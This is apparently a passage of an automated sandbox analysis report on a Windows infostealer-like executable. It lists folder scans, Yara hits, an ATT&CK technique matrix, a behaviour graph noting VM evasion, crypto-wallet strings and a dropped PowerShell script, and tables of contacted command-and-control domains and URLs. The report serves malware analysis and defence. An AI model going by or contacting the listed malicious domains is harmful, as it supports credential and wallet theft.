              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              221
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS221
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              Application Window Discovery
              SSHKeylogging115
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1601484 Sample: #Ud835#Udc7a#Ud835#Udc6c#Ud... Startdate: 28/01/2025 Architecture: WINDOWS Score: 100 19 rentry.co 2->19 21 traveladdicts.top 2->21 27 Suricata IDS alerts for network traffic 2->27 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 35 8 other signatures 2->35 8 #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe 1 2->8         started        signatures3 33 Connects to a pastebin service (likely for C&C) 19->33 process4 dnsIp5 23 traveladdicts.top 104.21.60.241, 443, 49734, 49736 CLOUDFLARENETUS United States 8->23 25 rentry.co 104.26.3.16, 443, 49865 CLOUDFLARENETUS United States 8->25 17 C:\Users\user\...\MVYET7Q4Z4FMOQW2PUNL.ps1, HTML 8->17 dropped 37 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->37 39 Query firmware table information (likely to detect VMs) 8->39 41 Found many strings related to Crypto-Wallets (likely being stolen) 8->41 43 3 other signatures 8->43 13 powershell.exe 7 8->13         started        file6 signatures7 process8 process9 15 conhost.exe 13->15         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe3%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              moonehobno.bond100%Avira URL Cloudmalware
              traveladdicts.top0%Avira URL Cloudsafe
              https://traveladdicts.top/L0%Avira URL Cloudsafe
              learnyprocce.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/K0%Avira URL Cloudsafe
              rainy-lamep.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/sd0%Avira URL Cloudsafe
              https://traveladdicts.top/apiC0%Avira URL Cloudsafe
              https://traveladdicts.top/c0%Avira URL Cloudsafe
              noxiuos-utopi.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/api:0%Avira URL Cloudsafe
              https://traveladdicts.top/api90%Avira URL Cloudsafe
              abaft-taboo.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/0%Avira URL Cloudsafe
              https://traveladdicts.top/api0%Avira URL Cloudsafe
              http://www.testlab2008.com/indices/submit.php?c=CD&i=0%Avira URL Cloudsafe
              cowertbabei.bond100%Avira URL Cloudmalware
              conquemappe.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/#0%Avira URL Cloudsafe
              elfinyamen.bond100%Avira URL Cloudmalware
              https://traveladdicts.top/30%Avira URL Cloudsafe
              https://traveladdicts.top/40%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              traveladdicts.top
              104.21.60.241
              truetrue
                unknown
                rentry.co
                104.26.3.16
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  moonehobno.bondtrue
                  • Avira URL Cloud: malware
                  unknown
                  traveladdicts.toptrue
                  • Avira URL Cloud: safe
                  unknown
                  rainy-lamep.bondtrue
                  • Avira URL Cloud: malware
                  unknown
                  learnyprocce.bondtrue
                  • Avira URL Cloud: malware
                  unknown
                  noxiuos-utopi.bondtrue
                  • Avira URL Cloud: malware
                  unknown
                  https://rentry.co/feouewe5/rawfalse
                    high
                    https://traveladdicts.top/apitrue
                    • Avira URL Cloud: safe
                    unknown
                    abaft-taboo.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    elfinyamen.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    conquemappe.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    cowertbabei.bondtrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtab#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/ac/?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                          high
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                            high
                            http://ocsp.sectigo.com0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                              high
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://traveladdicts.top/K#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://traveladdicts.top/L#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                    high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://rentry.co/static/icons/270.pnLRkqRpowershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                          high
                                          https://rentry.co/feouewe5/rawp#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://rentry.co/static/icons/512.pnghZ#lpowershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://traveladdicts.top/c#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://support.mozilla.org/products/firefoxgro.all#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://traveladdicts.top/sd#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://traveladdicts.top/apiC#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                high
                                                                https://sectigo.com/CPS0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                  high
                                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://traveladdicts.top/api9#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://traveladdicts.top/api:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2277383833.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.000000000075A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://rentry.co/static/icons/512.png#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drfalse
                                                                        high
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                          high
                                                                          https://rentry.co/d#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://traveladdicts.top/#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2315999928.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2309256685.0000000003741000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2451218517.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000754000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore6lBkqpowershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://ocsp.rootca1.amazontrust.com0:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpfalse
